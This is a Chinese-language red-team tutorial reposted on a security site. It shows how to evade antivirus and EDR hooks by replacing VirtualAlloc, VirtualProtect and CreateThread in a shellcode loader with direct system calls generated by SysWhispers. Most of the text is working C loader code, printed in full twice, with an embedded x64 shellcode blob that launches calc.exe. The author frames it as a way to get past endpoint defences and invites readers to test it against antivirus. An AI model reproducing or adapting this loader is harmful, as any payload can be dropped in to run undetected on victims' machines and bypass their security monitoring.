红队免杀培训-手把手教使用系统调用(上)

admin 2022年4月23日02:20:39SecIN安全技术社区红队免杀培训-手把手教使用系统调用(上)已关闭评论8 views5290字阅读17分38秒阅读模式

1.前言:

为了应对,AV/EDR对一些常规windows的api的监控,使用的github项目为Syswhispers,其实CS官方有个付费工具包叫 CobaltStrike Artifact,可以定制化生成有效负载,当然其中也包括了使用系统调用,替换掉beacon里面的api函数,当然付费真的用不起,对于穷人来说,只能靠手动冲!

2.实现:

在此之前,我们得想一想我们该替换什么api,我们需要用到什么api,看以下加载器的示例:

```

include

include

unsigned char calc_payload[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";
unsigned int calc_len = 276;

int main()
{
   DWORD oldprotect = 0;
   LPVOID base_addr = VirtualAlloc(0, calc_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
   RtlMoveMemory(base_addr, calc_payload, calc_len);
   auto vp = VirtualProtect(base_addr, calc_len, PAGE_EXECUTE_READ, &oldprotect);;
   auto ct = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)base_addr, 0, 0, 0);
   WaitForSingleObject(ct, -1);
   free(base_addr);
}
```

上面加载器代码使用了VirtualAlloc,VirtualProtect,CreateThread三个常用的Windows api,也是edr最常关注的api,对于这些函数,实际上很容易搜索到,最终调用 kernel32 中的NtAllocateVirtualMemory,NtProtectVirtualMemory,NtCreateThreadEx函数。

我们利用Syswhispers,就不用自己去找系统调用号了,完全可以忽视这个步骤,直接一键生成相关的.asm和.h 文件。

python3 Syswhispers.py -f NtCreateThreadEx,NtProtectVirtualMemory,NtAllocateVirtualMemory -o syscal

这里为啥需要.asm文件:

  1. 在X86平台上,我们应该使用混编方式执行汇编指令;
  2. 在X64平台上,我们应该使用.asm文件添加汇编函数。

这时候就需要判断位数,为了让一段包含汇编指令的代码能够同时在X86和X64平台上编译通过,我们要有办法让编译器自己判断硬件平台。编译器提供了名为_M_AMD64的宏,只有在X64平台上,这个宏才是被定义的

```

ifdef _M_AMD64

// 这是x64平台

else

// 这是x86平台

endif

```

还有一种写法:

```

include

ifdef AMD64

// 这是x64平台

else

// 这是x86平台

endif

```

但是这里用不上,我只是想说.asm文件完全可以不用,可以用内联汇编的方式进行编译。

首先,确保你当前的平台是x64平台。切记不要对x86平台下的.asm文件做任何修改,因为.asm文件在x86平台上是无法编译的,添加asm文件,是添加项目,而不是复制粘贴,然后点击属性,进行如下配置:

红队免杀培训-手把手教使用系统调用(上)

红队免杀培训-手把手教使用系统调用(上)

首先在“命令行”项中,我们应当输入指定的编译语句:ml64 /c %(fileName).asm。这条命令的意思是使用ml64.exe对.asm文件进行编译,在“输出”项中,我们设定输出文件为:%(fileName).obj,即编译后所生成的中间文件,编译的项目就包含了.asm文件了,看一下头文件的定义:

红队免杀培训-手把手教使用系统调用(上)
发现NtAllocateVirtualMemory和 NtProtectVirtualMemory 都需要一个ProcessHandle,我们用如下代码获得当前进程句柄。

HANDLE hProc = GetCurrentProcess();

同理NtProtectVirtualMemory也好替换。

最难的是NtCreateThreadEx,其实之前我们跟过流程的人都知道,在调用NtCreateThreadEx会设置很多环境变量,他的定义如下:

EXTERN_C NTSTATUS NtCreateThreadEx(
OUT PHANDLE ThreadHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN HANDLE ProcessHandle,
IN PVOID StartRoutine,
IN PVOID Argument OPTIONAL,
IN ULONG CreateFlags,
IN SIZE_T ZeroBits,
IN SIZE_T StackSize,
IN SIZE_T MaximumStackSize,
IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL);

我们必须创建一个新的 HANDLE 变量:

HANDLE thandle = NULL;

调用实例:

NTSTATUS ct = NtCreateThreadEx(
 &thandle,
 GENERIC_EXECUTE,
 NULL,
 hProc,
 base_addr,
 NULL,
 FALSE,
 0,
 0,
 0,
 NULL
);

然后完整代码:

```

include "syscall.h"

include

include

unsigned char calc_payload[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";
unsigned int calc_len = 276;

int main()
{
DWORD oldprotect = 0;
HANDLE hProc = GetCurrentProcess();
LPVOID base_addr = NULL;
HANDLE thandle = NULL;

NTSTATUS NTAVM = NtAllocateVirtualMemory(
    hProc, 
    &base_addr, 
    0, 
    (PSIZE_T)&calc_len, 
    MEM_COMMIT | MEM_RESERVE, 
    PAGE_READWRITE);
RtlMoveMemory(base_addr, calc_payload, calc_len);
NTSTATUS NTPVM = NtProtectVirtualMemory(
    hProc, 
    &base_addr, 
    (PSIZE_T)&calc_len, 
    PAGE_EXECUTE_READ, 
    &oldprotect);

NTSTATUS ct = NtCreateThreadEx(&thandle, GENERIC_EXECUTE, NULL, hProc, base_addr, NULL, FALSE, 0, 0, 0, NULL);
if (ct == 0)
{   
 printf("[*] -- shellcode start succesful!");
    free(base_addr);
    return 0;
}
printf("[*] -- shellcode start error!");
free(base_addr);
return 1;

}
```

红队免杀培训-手把手教使用系统调用(上)

演示,有手就行:

红队免杀培训-手把手教使用系统调用(上)

杀软咱就不测了,自行下去测试,咱就是讲思路,手把手教你使用系统调用绕edr,有些系统调用api Syswhispers没有,那么就只能自己去跟,然后去找系统调用号,预计下篇进行讲解。

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月23日02:20:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  红队免杀培训-手把手教使用系统调用(上) http://cn-sec.com/archives/917283.html